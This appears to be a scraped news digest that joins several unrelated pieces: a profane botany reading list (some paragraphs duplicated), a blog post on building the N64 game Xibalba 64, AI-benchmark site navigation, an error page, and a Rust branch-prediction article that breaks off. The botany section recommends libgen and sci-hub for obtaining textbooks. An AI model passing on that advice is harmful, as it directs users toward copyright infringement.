10 interesting stories served every morning and every evening.

Reading List — Crime Pays But Botany Doesn't

www.crimepaysbutbotanydoesnt.com

SO YOU WANT TO TEACH YOURSELF BOTANY…

I fre­quently get mes­sages from peo­ple who re­ally want to teach them­selves botany and learn ex­actly where the fuck to start iden­ti­fy­ing plants and learn­ing about them. The field is full of in­tim­i­dat­ing words (as well as some pow­dery stiffs, like much of Academia) and a con­fus­ing lex­i­con that can be a turn off to the layper­son. I’m telling you this though - don’t be in­tim­i­dated. With the in­ter­net, you have 24 hour ac­cess to the li­brary. Use it. Ask ques­tions. See a word you don’t un­der­stand? Look it up. Read about a con­cept that does­n’t make any sense to you (ie what the shit does monophyletic’ mean and why is it im­por­tant)? Figure out what about it is con­fus­ing and ask the damn google.

That said, there are some key con­cepts you should un­der­stand that will make things a lot eas­ier. They are:

Latin ter­mi­nol­ogy - why do we use Latin? Well, be­cause some dead guy named Linnaeus re­al­ized we need a uni­ver­sal sys­tem that sci­en­tists from mul­ti­ple dif­fer­ent cul­tures could use (at the time, he was prob­a­bly mostly think­ing of white European cul­tures”, and while we can ac­knowl­edge how back­wards and fuck­ing goofy this is now, we can still ad­mit that Linnaeus’ ide­ol­ogy was sim­ply flawed like his time and NOT throw out the baby with the prover­bial bath wa­ter. The fucker cre­ated a beau­ti­ful sys­tem, and it works. And that’s why we still use it. I say this be­cause a few un­think­ing performative left­ist” nitwits as of late have de­cided to at­tack the sci­ence of tax­on­omy it­self). Common names sim­ply don’t work on a large scale. One com­mon name (ie cedar”) can re­fer to 8 dif­fer­ent to­tally un­re­lated plants, where as Cedrus refers specif­i­cally to the genus which con­tains the species C. libani, C. de­o­dara, and C. at­lantica. When botanic names (or any or­gan­is­m’s name) is writ­ten in sci­en­tific nomen­cla­ture, the genus name is cap­i­tal­ized and the species name is lower case, and the name it­self is usu­ally writ­ten in ital­ics. If you write a species name Cedrus Atlantica” it is a dead give-away that you don’t know what the fuck you are do­ing. I was po­litely cor­rected on this point more than a decade ago, and I never hes­i­tate to po­litely cor­rect oth­ers. It’s like be­ing cour­te­ous enough to tell some­body that they have a booger on their face.

Taxonomy : IS THERE A METHOD TO THE MADNESS? WHAT GIVES? - In short, yes, there is, ab­solutely, and it is so FUCKING cool. Why is it cool? Because we now group things ac­cord­ing to how evo­lu­tion­ar­ily re­lated are, and how they evolved. Once you learn the key con­cepts and traits that unite a fam­ily or a genus or a tribe, you can now iden­tify mem­bers of that evo­lu­tion­ary group­ing that you have never seen be­fore. This is how I can see a plant that I have never en­coun­tered be­fore and au­to­mat­i­cally know what other plants its re­lated to, what fam­ily or genus it is in, and thus know what tax­o­nomic group to search for it un­der (on inat­u­ral­ist us­ing the explore” fea­ture or with a key (flora), etc).

Plant Systematics by Michael Simpson

This is the sem­i­nal text­book to use if you are de­cid­ing to take the deeper dive into botany. Plant Systematics is the study of plant evo­lu­tion, and fur­ther­more is the study of plant iden­ti­fi­ca­tion as it re­lates to plant evo­lu­tion via an un­der­stand­ing of SYNAPOMORPHIES. This text­book by Dr. Michael Simpson lays out why botanists were able to tell how closely re­lated cer­tain plant fam­i­lies and or­ders were BEFORE the ad­vent of DNA analy­sis, as well as why some of those prior as­sump­tions were found to be wrong. This is a fam­ily-by-fam­ily, and or­der-by-or­der way to be­come fa­mil­iar with plant mor­phol­ogy and evo­lu­tion. This is also an ex­cel­lent way to one day be able to see new plants that you have never seen be­fore and au­to­mat­i­cally know what fam­i­lies or gen­era they might be re­lated to sim­ply by ob­serv­ing them. At pre­sent, the third edi­tion is the most cur­rent and it is a book that you will use as a ref­er­ence for the next ten years (at least) of your life.

Plant Systematics by Michael Simpson

This is the sem­i­nal text­book to use if you are de­cid­ing to take the deeper dive into botany. Plant Systematics is the study of plant evo­lu­tion, and fur­ther­more is the study of plant iden­ti­fi­ca­tion as it re­lates to plant evo­lu­tion via an un­der­stand­ing of SYNAPOMORPHIES. This text­book by Dr. Michael Simpson lays out why botanists were able to tell how closely re­lated cer­tain plant fam­i­lies and or­ders were BEFORE the ad­vent of DNA analy­sis, as well as why some of those prior as­sump­tions were found to be wrong. This is a fam­ily-by-fam­ily, and or­der-by-or­der way to be­come fa­mil­iar with plant mor­phol­ogy and evo­lu­tion. This is also an ex­cel­lent way to one day be able to see new plants that you have never seen be­fore and au­to­mat­i­cally know what fam­i­lies or gen­era they might be re­lated to sim­ply by ob­serv­ing them. At pre­sent, the third edi­tion is the most cur­rent and it is a book that you will use as a ref­er­ence for the next ten years (at least) of your life.

Raven’s Biology of Plants

This text­book cov­ers many of the ba­sics of plant bi­ol­ogy as well as get­ting into the nu­ances of plant evo­lu­tion, with ex­cel­lent ex­am­ples of some of the more charis­matic and cu­ri­ous plant species out there. It also does a great job of ex­plain­ing what botanists know so far about how plants evolve and how se­lec­tion pres­sures work to cause all the variations on a theme” and endless forms most beau­ti­ful” that got Darwin all horny. What is an eco­type you say? What is the Hardy-Weinberg the­o­rem? What are al­lele fre­quen­cies? What is con­ver­gent evo­lu­tion? All these con­cepts are ex­plained, in depth, in this ex­cel­lent text book.

Raven’s Biology of Plants

This text­book cov­ers many of the ba­sics of plant bi­ol­ogy as well as get­ting into the nu­ances of plant evo­lu­tion, with ex­cel­lent ex­am­ples of some of the more charis­matic and cu­ri­ous plant species out there. It also does a great job of ex­plain­ing what botanists know so far about how plants evolve and how se­lec­tion pres­sures work to cause all the variations on a theme” and endless forms most beau­ti­ful” that got Darwin all horny. What is an eco­type you say? What is the Hardy-Weinberg the­o­rem? What are al­lele fre­quen­cies? What is con­ver­gent evo­lu­tion? All these con­cepts are ex­plained, in depth, in this ex­cel­lent text book.

Additional Texts

It’s al­ways great to be able to sup­port au­thors by buy­ing their books, but some­times the cost of self-ed­u­ca­tion can pro­hib­i­tive. It is my firm be­lief that any of the au­thors listed be­low (unless they’re dicks) would not want any­one to be pro­hib­ited from read­ing their work. This is why sources like www.lib­gen.is and www.sci-hub.se and other book shar­ing web­sites ex­ist. In this case I sug­gest pur­chas­ing a cheap an­droid tablet and be­com­ing ac­quainted with the idea of read­ing text­books in pdf form. A half pound elec­tronic de­vice can store up­wards of half a mil­lion pages or more worth of text­books. Phylogeny and Evolution of the Angiosperms by Pam and Doug SoltisThe Tangled Tree by David QUammen - A Good pop-sci ex­pla­na­tion of mol­e­c­u­lar phy­lo­ge­net­ics and un­der­stand­ing evo­lu­tion­Plant Evolution : An Introduction to the History of Life by Karl NiklasBotany Illustrated by Janice Glimm-LacyAnnals of the Former World (geology) by John MacpheeBotany for Gardeners by Brian CaponThe Ecology of Plants by Jessica GurevitchA Botanist’s Vocabulary by Susan PellThe Rose’s Kiss by Peter BernhardtFlowering Plant Families by Wendy ZomleferHow the Earth Turned Green by Joseph ArmstrongThe Origin, Expansion, and Demise of Plant Species by Donald LevinThe Ecology of Seeds by Michael FennerThe Fungi by Sarah WatkinsonBiogeography : An Ecological and Evolutionary Approach by C. Barry CoxEvolution Making Sense of Life by Carl ZimmerCacti Biology and UsesAn Island Called California by Elna Baker (a great text due to it’s ex­pla­na­tion of eco­log­i­cal re­la­tion­ships even if you don’t live in California)Serpentine Geoecology of Western North America by Earl AlexanderA Natural History of California by Allan SchoenherrEcology of Desert Systems by WhitfordThe California Deserts by Bruce PavlikPlant and Animal Endemism in California by Susan Harrison (again - great ex­pla­na­tions even if you’re not into California. IT is a great case study)

Additional Texts

It’s al­ways great to be able to sup­port au­thors by buy­ing their books, but some­times the cost of self-ed­u­ca­tion can pro­hib­i­tive. It is my firm be­lief that any of the au­thors listed be­low (unless they’re dicks) would not want any­one to be pro­hib­ited from read­ing their work. This is why sources like www.lib­gen.is and www.sci-hub.se and other book shar­ing web­sites ex­ist. In this case I sug­gest pur­chas­ing a cheap an­droid tablet and be­com­ing ac­quainted with the idea of read­ing text­books in pdf form. A half pound elec­tronic de­vice can store up­wards of half a mil­lion pages or more worth of text­books.

Phylogeny and Evolution of the Angiosperms by Pam and Doug Soltis

The Tangled Tree by David QUammen - A Good pop-sci ex­pla­na­tion of mol­e­c­u­lar phy­lo­ge­net­ics and un­der­stand­ing evo­lu­tion

Plant Evolution : An Introduction to the History of Life by Karl Niklas

Botany Illustrated by Janice Glimm-Lacy

Annals of the Former World (geology) by John Macphee

Botany for Gardeners by Brian Capon

The Ecology of Plants by Jessica Gurevitch

A Botanist’s Vocabulary by Susan Pell

The Rose’s Kiss by Peter Bernhardt

Flowering Plant Families by Wendy Zomlefer

How the Earth Turned Green by Joseph Armstrong

The Origin, Expansion, and Demise of Plant Species by Donald Levin

The Ecology of Seeds by Michael Fenner

The Fungi by Sarah Watkinson

Biogeography : An Ecological and Evolutionary Approach by C. Barry Cox

Evolution Making Sense of Life by Carl Zimmer

Cacti Biology and Uses

An Island Called California by Elna Baker (a great text due to it’s ex­pla­na­tion of eco­log­i­cal re­la­tion­ships even if you don’t live in California)

Serpentine Geoecology of Western North America by Earl Alexander

A Natural History of California by Allan Schoenherr

Ecology of Desert Systems by Whitford

The California Deserts by Bruce Pavlik

Plant and Animal Endemism in California by Susan Harrison (again - great ex­pla­na­tions even if you’re not into California. IT is a great case study)

How to Make a Nintendo 64 Game in 2026

phoboslab.org

— Tuesday, August 4th 2026

Two years ago, I was Porting my JavaScript Game Engine to C for No Reason. I have since found a rea­son: mak­ing a new N64 game!

The re­sult is Xibalba 64 — a Wolfenstein 3D-like FPS. Modretro agreed to pub­lish the game as a phys­i­cal launch ti­tle for their M64 (a mod­ern N64 clone), com­plete with car­tridge, pack­ag­ing and man­ual!

Xibalba 64 on Modretro.com

This, to my knowl­edge, is only the sec­ond phys­i­cal re­lease of any new N64 game since the end of the con­sole’s orig­i­nal com­mer­cial life. The in­fa­mous Xeno Crisis by Bitmap Bureau — orig­i­nally a new game for the Sega Mega Drive and sub­se­quently re­leased on many, many more con­soles — came to the N64 in 2023. No other new games have been pub­lished for the N64 since Tony Hawk’s Pro Skater 3 in 2002.

The Engine

Impact was a JavaScript game en­gine I de­vel­oped back in 2010. It was tai­lored for 2D ac­tion games, han­dling tile sheets, back­ground maps, sprites and col­li­sion de­tec­tion. It’s very sim­ple, but still a sound foun­da­tion for what­ever you want to throw at it.

Two years ago I rewrote Impact in C. Why? I don’t know. It was fun.

This C port, high­_im­pact, has a no­tion of a platform back­end”. The plat­form han­dles the low-level plumb­ing — open­ing a win­dow, cre­at­ing a draw­ing sur­face, read­ing in­put, etc. Out of the box, high­_im­pact comes with two plat­form back­ends (SDL2 and Sokol), and you can com­pile your game for ei­ther one. This al­ready en­ables high­_im­pact games to run on many dif­fer­ent de­vices.

The ren­der­ing back­end in high­_im­pact is also mod­u­lar. You can com­pile your game with a soft­ware ren­derer, OpenGL or Metal (for iOS/​ma­cOS). Support for new plat­form back­ends or ren­der­ing back­ends can be added with­out mod­i­fy­ing any other part of the en­gine.

A per­fect start­ing point for an N64 game.

N64 Hardware and Platform Library

The N64 is a quirky beast. In ad­di­tion to the 93 MHz MIPS CPU (big-endian!), it has two co­proces­sors for han­dling graph­ics, sound and more:

Reality Display Processor” (RDP) — a fixed-func­tion graph­ics proces­sor

Reality Signal Processor” (RSP) — a pro­gram­ma­ble vec­tor proces­sor

Both of these live in the same phys­i­cal pack­age, com­monly called the Reality Coprocessor” (RCP).

Image from the N64Brew Wiki

For the first few years of the N64′s life, Nintendo closely guarded ac­cess to the RSP. It was ex­clu­sively used by Nintendo’s of­fi­cially sanc­tioned plat­form li­brary, libultra”. Only later did Nintendo al­low game stu­dios to write cus­tom microcode” (actually just MIPS as­sem­bly) for the RSP.

Keeping the hard­ware happy is no sim­ple feat, and the in­struc­tions for the RDP are quirky and com­pli­cated. Programming your game on bare metal is pretty much out of the ques­tion. In re­cent years, Nintendo’s of­fi­cial libultra” has made its way onto the in­ter­net, but us­ing it would risk a copy­right law­suit.

Luckily, the N64 home­brew scene has picked up a lot of steam in the last few years and we have a very ca­pa­ble al­ter­na­tive now: Libdragon.

Libdragon is ba­si­cally SDL for the N64. It pro­vides fa­cil­i­ties for draw­ing sprites and tri­an­gles, sound out­put, con­troller in­put and much more.

It took me only a few evenings to build a new plat­form back­end for high­_im­pact on top of lib­dragon. I tested this with Biolab Disaster. The game code re­mained un­mod­i­fied; per­for­mance was meh, but I was us­ing the N64 hard­ware in the most naive way pos­si­ble.

Dev Environment

Libdragon pro­vides the com­pil­ers and every­thing else that’s nec­es­sary to build a ROM file for the N64. The in­stal­la­tion in­struc­tions and all other doc­u­men­ta­tion are com­pre­hen­sive and well-writ­ten. The li­brary comes with many ex­am­ples to get you started.

In gen­eral, it was a plea­sure to work with Libdragon. Just a heads up: you prob­a­bly want to use the pre­view branch as the stable” trunk branch has hope­lessly fallen be­hind.

For test­ing, a good em­u­la­tor is in­valu­able. For the longest time, N64 em­u­la­tion was ex­tremely in­ac­cu­rate. Lackluster em­u­la­tion of the RSP and RDP co­proces­sors, in par­tic­u­lar, was the cause of most prob­lems.

Most em­u­la­tors just em­u­lated Nintendo’s plat­form li­brary, libul­tra. They em­u­lated the in­tent to draw a tri­an­gle, not what the hard­ware would ac­tu­ally do. While in­ac­cu­rate, this made em­u­la­tion pos­si­ble at all in the early days. Famously, UltraHLE (“Ultra High Level Emulator”) was re­leased well within the life­time of the N64 and caused a lot of headaches and sub­se­quent law­suits.

These days the N64 core in Ares is much closer to the ac­tual hard­ware — the RDP and RSP are fully em­u­lated, in­clud­ing ac­cu­rate tim­ing for the RSP. The in­fa­mous slow mem­ory band­width of the N64, how­ever, can still only be tested on real hard­ware (which re­cently caused me some dis­ap­point­ment).

So you need a real N64 and a car­tridge that lets you play ar­bi­trary .z64 ROM files. The open-source SummerCart64 is ex­cel­lent and avail­able from many dif­fer­ent man­u­fac­tur­ers. Be aware: some man­u­fac­tur­ers (especially on AliExpress) cheap out on the com­po­nents of the board.

SummerCart64 has the usual SD card slot to store your ROMs, but what makes it great for de­vel­op­ment is its USB-C port: you can di­rectly con­nect it to your PC and up­load a ROM as part of your build process us­ing sc64de­ployer.

I ended up with the N64 next to my PC, con­nected via USB, and used a cheap $10 USB ana­log cap­ture card to dis­play its video out­put in a win­dow on my desk­top. On Linux, it took some fid­dling with mpv to get low-la­tency out­put; here’s the script I used.

With this setup, it­er­at­ing on real hard­ware was just a mat­ter of com­pil­ing and push­ing the N64 re­set but­ton.

The Game

I orig­i­nally made Xibalba as a demo for my JavaScript game en­gine in 2014. WebGL was still the hot new thing back then; a 3D game in a browser was quite a nov­elty. The game was very short, fea­tur­ing only a hand­ful of lev­els, weapons and en­emy types.

In con­trast, I wanted Xibalba 64 to be a real game, not just a demo. So I not only needed to port the game to C and high­_im­pact, but also ex­pand on it with more lev­els, more en­emy types and more weapons.

high­_im­pact is a 2D game en­gine, but Xibalba 64 is clearly 3D. Well, not quite. Since the game has no el­e­va­tion, it can be mostly treated as 2D. You could con­cep­tu­ally play Xibalba 64 from a 2D top-down per­spec­tive. Of course, that would­n’t be as ex­cit­ing, but all the physics, move­ment and shoot­ing would work the same way. In this re­gard, the game is very sim­i­lar to Wolfenstein 3D.

Many of high­_im­pact’s physics func­tions ex­pect a vec2_t ar­gu­ment with .x and .y com­po­nents. But for draw­ing, I ab­solutely needed a 3D po­si­tion, so I came up with this de­f­i­n­i­tion for a vec3_t type and changed the en­ti­ty_t type:

type­def struct { float x, y; } vec2_t;

type­def union { vec2_t xy; struct { float x, y, z; }; } vec3_t;

type­def struct { // … vec3_t pos; vec3_t vel; // … } en­ti­ty_t;

Now, when­ever I need to call a func­tion that ac­cepts a vec2_t, I can convert” from vec3_t for free:

trace_t res = trace(col­li­sion_map, en­tity->pos.xy, en­tity->vel.xy);

Since the in­ner vec3_t struct is anonymous”, I can still ac­cess all val­ues di­rectly; i.e., en­tity->pos.z works just fine.

The ini­tial port of the ex­ist­ing lev­els and en­emy types went quite smoothly and was fin­ished in about two weeks. I then spent an­other few months on ex­tend­ing the game and op­ti­miz­ing the ren­derer.

Most of Libdragon’s func­tions fit nat­u­rally into a new plat­form and ren­der­ing back­end, though I had to change some other parts of high­_im­pact to by­pass its mixer (Libdragon has its own, ac­cel­er­ated by the RSP) and im­age loader.

Throughout the whole process, I re­tained the abil­ity to build the game with the SDL2 or Sokol back­ends. This was great for playtest­ing game logic and en­emy be­hav­ior. To make lev­els, I also im­ple­mented a sim­ple hot-re­load mech­a­nism trig­gered when­ever a level file changed.

The level ed­i­tor, bun­dled with high­_im­pact, is a sin­gle self-con­tained HTML file. I ended up ex­tend­ing it quite a bit to add bet­ter sup­port for lightmaps, dis­play ac­tual sprites for en­ti­ties (instead of just boxes), add de­scrip­tions for en­tity set­tings and pro­vide other small fea­tures. The sin­gle source of truth is still the C source code — the level ed­i­tor reads it and ex­tracts the en­tity types and sup­ported set­tings au­to­mat­i­cally.

Since the level ed­i­tor still works with JSON files, I built a small map com­piler that reads the JSON and emits bi­nary data. While load­ing JSON on the N64 is of course pos­si­ble, it added some un­nec­es­sary ~100 ms of load time. So dur­ing the build process, each JSON level file is con­verted into a struct that es­sen­tially looks like this:

type­def struct { uin­t16_t magic; uin­t16_t en­ti­ties_len; uin­t16_t map_width; uin­t16_t map_height;

struct { uin­t16_t type­_id; uin­t16_t x; uin­t16_t y; uin­t16_t set­tings_len; struct { uin­t16_t set­ting_­type; // such as name”, target”, size”, … union { float16_t float_­value; in­t16_t in­t_­value; struct { in­t16_t string_len; char string_­value; }; } value; } set­tings[set­tings_len]; } en­ti­ties[en­ti­ties_len];

uin­t16_t col­li­sion_map[map_width * map_height]; uin­t16_t floor_map[map_width * map_height]; uin­t16_t wal­l_map[map_width * map_height]; uin­t16_t ceil­ing_map[map_width * map_height]; uin­t16_t light_map[map_width * map_height]; } lev­el_t;

The level com­piler writes those val­ues in big-en­dian for­mat for the N64 and lit­tle-en­dian for­mat for x86 (SDL2, Sokol, WASM), so we can eas­ily read every­thing on all plat­forms with­out byte swap­ping.

Rendering

Libdragon it­self has a func­tion for draw­ing tri­an­gles: rd­pq_­tri­an­gle() in­serts a sin­gle tri­an­gle draw call into the RDP queue. While this works, what you re­ally want to do is sub­mit your draw calls to the RSP, have some cus­tom mi­croc­ode to per­form trans­for­ma­tions, light­ing, depth cal­cu­la­tions, etc., and then let the RSP in­struct the RDP to ul­ti­mately draw the tri­an­gle.

The in­tri­ca­cies of the RDP and RSP were still new to me, but luck­ily an­other out­stand­ing open-source li­brary, Tiny3D, han­dles all this and more with a sim­ple-to-use API. Getting some­thing on the screen was the easy part; mak­ing it per­for­mant was a whole other en­deavor.

The N64 in­fa­mously only has 4 KB of tex­ture mem­ory. The largest tex­tures you can up­load are just a mea­ger 64×64 pix­els. Even worse, the mem­ory la­tency for a tex­ture up­load is atro­cious. One so­lu­tion, used by Mario 64 and many other ti­tles, is to ren­der un­tex­tured poly­gons when­ever you can.

This would­n’t re­ally fly with the style of my game, so in­stead I had to be re­ally care­ful with the draw or­der of level tiles to min­i­mize tex­ture up­loads. On top of that, Tiny3D can load and sub­mit up to 17 quads at once, and it would be waste­ful not to use that. So I ended up col­lect­ing batches of tri­an­gles with the same tex­ture in 64-bit draw calls:

type­def union ren­der_­call { uin­t64_t packed; uin­t32_t hash­able; uin­t64_t ident : 46; struct { uin­t64_t translu­cent : 1; uin­t64_t tex­ture_in­dex : 9; uin­t64_t x : 10; uin­t64_t y : 10; uin­t64_t w : 8; uin­t64_t h : 8; uin­t64_t vbi : 14; uin­t64_t len : 4; }; } ren­der_­cal­l_t;

Here vbi is the ac­com­pa­ny­ing ver­tex buffer in­dex, and len is the num­ber of quads in this call. Since every call is just 64 bits wide, we can ef­fi­ciently sort them at the end of the frame and is­sue them to Tiny3D.

But be­fore I could do all this, I had to first fig­ure out which parts of a level are ac­tu­ally vis­i­ble. The orig­i­nal JavaScript Xibalba used a por­tal sys­tem, di­vid­ing each level into sec­tors and pre­com­put­ing which sec­tors were vis­i­ble from the cur­rent one. This worked fine, but pro­duced a bit more over­draw than I would have liked.

So I opted for an­other ap­proach: ray­cast­ing. Yes, the game is just cast­ing 320 rays into the scene, cov­er­ing the whole field of view. Each ray marks tra­versed tiles in a bitmap for sub­mis­sion to the ren­derer.

Later, I op­ti­mized the ray­cast­ing a bit more by re­cur­sively di­vid­ing the 320-pixel field of view un­til two rays hit the same tile. In this process, I also check whether any of the tra­versed tiles are miss­ing a ceil­ing — if so, we have to draw a sky­box.

Fun fact: the sky­box in Xibalba 64 is just a sin­gle 32×32-pixel tex­ture that is beau­ti­fully smeared across the hori­zon.

As an­other op­ti­miza­tion, I arranged each tile sheet that would­n’t fit in a sin­gle up­load into a sin­gle col­umn and tried to use just 4-bit in­dexed col­ors wher­ever pos­si­ble. Using fewer col­ors al­lowed more pix­els to fit into tex­ture mem­ory, and the col­umn lay­out en­sured that each tile could be up­loaded as a sin­gle, con­tin­u­ous chunk of mem­ory.

With all of this, the game runs at a sta­ble 60 FPS. Something not many other N64 games can claim!

The four-player split-screen mode does­n’t quite hit the 60 FPS mark at all times, but still re­mains fluid. In con­trast, GoldenEye 007 in­fa­mously of­ten dropped into sin­gle-digit frame rates here.

Sound & Music

As with all my other games, my good friend Andreas Lösch pro­duced some out­stand­ing mu­sic. You can lis­ten to the whole Xibalba 64 Soundtrack on Bandcamp.

The game it­self also has a built-in mu­sic player that you can un­lock in the sin­gle-player cam­paign.

Cartridge space is tight, and even com­pressed au­dio is typ­i­cally ei­ther quite large or too ex­pen­sive to de­code.

In a heroic ef­fort, Giovanni Bajo — one of the main­tain­ers of Libdragon and an ab­solute wiz­ard when it comes to any­thing N64 — im­ple­mented an RSP-accelerated Opus de­coder. For con­text: Opus is an au­dio codec first pub­lished in 2012. That’s 16 years(!) af­ter the N64. It’s a mar­vel that it works at all, but sadly it’s still a bit too com­pu­ta­tion­ally ex­pen­sive to be used dur­ing game­play.

(Aside: Giovanni Bajo went on to im­ple­ment a real-time H.264 de­coder for the N64, too.)

The bet­ter op­tion for now is a sim­ple 4-bit VADPCM for­mat that Libdragon trans­par­ently de­codes on the RSP dur­ing play­back. The com­pres­sion ra­tio, of course, is­n’t great, but it’s way bet­ter than un­com­pressed WAV. About 31 MB of the 32 MB ROM is used by sound and mu­sic.

After the re­lease of Xibalba 64, I started to im­ple­ment an­other au­dio com­pres­sion for­mat that would bet­ter ad­dress the space/​qual­ity/​com­plex­ity trade-off. More on that in the next blog post!

Publishing & Sales

Modretro pre­vi­ously made a Game Boy Color clone — the Chromatic — com­pat­i­ble with all ex­ist­ing Game Boy and Game Boy Color games, and they were quite ea­ger to pub­lish many new games by hob­by­ist de­vel­op­ers, too.

When they an­nounced the M64, I thought this would be a great chance to get on board. As soon as I had a work­ing pro­to­type ready and was con­fi­dent that I would be able to build the whole game (and make it good), I wrote an email to the generic Modretro cus­tomer ser­vice ad­dress and, to my sur­prise, heard back from the head of pub­lish­ing within a day.

Bureaucracy was min­i­mal and the con­tract was straight­for­ward. I re­quested some changes that would al­low me to re­lease the game en­gine as open source later on, which Modretro was happy to ac­com­mo­date.

Of course, as it goes with these pro­jects, there were some de­lays and I only re­ceived a pre-pro­duc­tion M64 late in the de­vel­op­ment process. But it did­n’t mat­ter — the M64 worked as ad­ver­tised; no changes to the game for the M64 were nec­es­sary.

Modretro also of­fered help with the box art, but an­other friend of mine was ea­ger to do this in­stead. He later told me that, back in the 90s, he was re­spon­si­ble for the pack­ag­ing of many ti­tles pub­lished by Sierra in Germany, in­clud­ing Half-Life. So it’s no sur­prise that the Xibalba 64 box art turned out great!

For the man­ual, I sup­plied text and il­lus­tra­tions to Modretro, and they laid it out for print. Smooth sail­ing. You can have a look at the PDF man­ual on the Xibalba 64 store page.

I’m not able to talk about sales num­bers or my con­tract with Modretro in de­tail, and the game was re­leased only a few days ago, but so far it’s look­ing quite good. Of course, mak­ing N64 games will prob­a­bly not let you quit your job, but it looks like it will pay for a few nice hol­i­days.

Huge thanks to Giovanni Bajo of Libdragon, Max Bebök of Tiny3D, the en­tire N64brew Discord com­mu­nity and, of course, the Modretro team for pulling this off!

Here’s the fi­nal trailer for the game.

Resources

If you’re look­ing to get started with N64 de­vel­op­ment, these re­sources may help:

n64.dev — a col­lec­tion of every­thing re­lated to N64 de­vel­op­ment

N64brew Discord — a very friendly and help­ful com­mu­nity; many of the li­brary de­vel­op­ers are here

Libdragon — the sys­tem li­brary for the N64

Tiny3D — a sim­ple and fast 3D graph­ics li­brary

Pyrite64 — a vi­sual ed­i­tor and run­time for cre­at­ing 3D games

AI Model & API Providers Analysis | Artificial Analysis

artificialanalysis.ai

Intelligence

Intelligence of lead­ing AI mod­els based on our in­de­pen­dent eval­u­a­tions

Coding Agent Index

Performance, cost, and ex­e­cu­tion time for lead­ing cod­ing agents on end-to-end soft­ware en­gi­neer­ing tasks

Image & Video

Top mod­els from our Image Arena and Video Arena leader­boards, with 95% con­fi­dence in­ter­vals

Speech

Top mod­els from our Text to Speech Arena, Speech to Text and Speech to Speech eval­u­a­tions

Measures the per­for­mance of mod­els on spe­cific ca­pa­bil­i­ties and in­dus­tries

Openness Index

Artificial Analysis Openness Index as­sesses how open’ mod­els are on the ba­sis of their avail­abil­ity and trans­parency across dif­fer­ent com­po­nents.

Output Tokens

Output to­kens of lead­ing AI mod­els based on our in­de­pen­dent eval­u­a­tions

Cost

Price and real-world costs of lead­ing AI mod­els based on our in­de­pen­dent eval­u­a­tions

Speed & Latency

Comparison of first-party API per­for­mance

Access Denied

www.costar.com

Reference #18.1878ce17.1786057830.23ddfedb

https://​er­rors.edge­suite.net/​18.1878ce17.1786057830.23ddfedb

Branchless Rust: Making a Filter 4x Faster by Removing an if | Serhii Potapov (greyblake)

www.greyblake.com

Branchless Rust: Making a Filter 4x Faster by Removing an if

DISCLAIMER: this ar­ti­cle con­tains parts of text writ­ten with help of an LLM.

Most of my ca­reer I spent in the do­main world pro­gram­ming, where cor­rect­ness mat­ters much more than per­for­mance. Using Rust al­ready made things fast enough. Avoid the N+1 SQL queries prob­lem and usu­ally we are good.

But re­cently I found my­self in a sit­u­a­tion where I ac­tu­ally had to op­ti­mize a hot path. This is how I dis­cov­ered the branch­less pro­gram­ming tech­nique, and its re­sults blew my mind. Let me share it with you on a small ex­am­ple.

The prob­lem

Let’s keep things sim­ple. We need to fil­ter a slice of num­bers and re­turn the el­e­ments that are greater than a given thresh­old (a typ­i­cal prob­lem that data­base en­gines solve all day long). Normally I would write the fol­low­ing code:

pub fn fil­ter_iter(in­put: &[f64], thresh­old: f64) -> Vec<f64> { in­put.iter().copied().fil­ter(|&x| x > thresh­old).col­lect() }

Easy to read, id­iomatic, cor­rect. Usually I would not touch it ever again. But what if this beast hap­pens to be on a hot path? Let’s bench­mark it!

The in­put is one mil­lion ran­dom f64 val­ues uni­formly spread over 0.0..100.0. Instead of one thresh­old we will try sev­eral, cho­sen so that the fil­ter keeps 1%, 25%, 50%, 75% or 99% of the el­e­ments. For ex­am­ple, the thresh­old 50.0 keeps about a half.

The bench­marks are made with cri­te­rion and live in the branch­less-rust-bench­marks repo, so you can re­pro­duce every­thing on your own ma­chine.

Puzzling re­sults

Here is what cri­te­rion re­ports on my lap­top (Intel i7 – 10875H):

Look at the 50% row. We copy only half of the el­e­ments, yet it is the slow­est case of all. Keeping 99% means copy­ing al­most twice as much data, and still it is 2.6 times faster.

The amount of in­put is iden­ti­cal in every row, and the amount of out­put clearly does not ex­plain the tim­ings. Something else is go­ing on.

First in­stinct: pre­al­lo­cate

Let’s rule out the usual sus­pect first. col­lect() does not know the out­put size in ad­vance, so the Vec grows and re­al­lo­cates along the way. Every Rust de­vel­oper has a re­flex for that: pre­al­lo­cate!

pub fn fil­ter_pre­al­loc(in­put: &[f64], thresh­old: f64) -> Vec<f64> { let mut out = Vec::with_capacity(input.len()); for &x in in­put { if x > thresh­old { out.push(x); } } out }

The re­sult at 50% kept: 3.87 ms. About 2% faster. The re­al­lo­ca­tions were real, but they were never the bot­tle­neck. Then what is?

What CPUs do be­hind our back

Let’s stop for a mo­ment and re­fresh how CPUs ac­tu­ally work.

A mod­ern CPU does not ex­e­cute one in­struc­tion at a time. It runs a deep pipeline: while one in­struc­tion ex­e­cutes, the next ones are al­ready be­ing fetched and de­coded. This works beau­ti­fully, un­til the in­struc­tion stream hits a fork in the road:

if x > thresh­old { /* keep */ } else { /* skip */ }

Which way does the road go? The CPU can­not know un­til the com­par­i­son ac­tu­ally fin­ishes. And it re­fuses to wait. Instead it guesses (the hard­ware re­spon­si­ble for guess­ing is called the branch pre­dic­tor) and spec­u­la­tively runs ahead along the guessed path.

The pre­dic­tor is like a barista who starts mak­ing your usual or­der the mo­ment you walk in. If you are a reg­u­lar, this is fan­tas­tic: the cof­fee is ready when you reach the counter. If you or­der some­thing ran­dom every day, the barista keeps pour­ing drinks into the sink.

A wrong guess is ex­pen­sive. The CPU has to throw away every­thing it started spec­u­la­tively, flush the pipeline and restart from the fork. On a typ­i­cal mod­ern x86 core this costs around 15 – 20 cy­cles. The com­par­i­son it­self costs about one.

Now our table starts to make sense:

Keep 1%: the an­swer is al­most al­ways skip”. The pre­dic­tor guesses skip” and is right 99% of the time. Nearly free.

Keep 99%: the same story in the op­po­site di­rec­tion.

Keep 50% of ran­dom data: there is no pat­tern to learn. The pre­dic­tor is re­duced to a coin flip and is wrong on every sec­ond el­e­ment. That is half a mil­lion pipeline flushes. At 15 – 20 cy­cles each it adds up to roughly 2 ms of pure penalty on a 4 GHz core, which is pretty much the gap be­tween the 50% and the 99% rows.

Note that the vil­lain is not the branch it­self. It is the branch that de­pends on un­pre­dictable data. Which sug­gests a fun ex­per­i­ment.

The smok­ing gun

If mis­pre­dic­tions are the prob­lem, we should be able to keep the same data, the same thresh­old and the same code, and change only the or­der of the el­e­ments. Let’s sort the in­put (outside of the mea­sured sec­tion, of course) and re­run the 50% case:

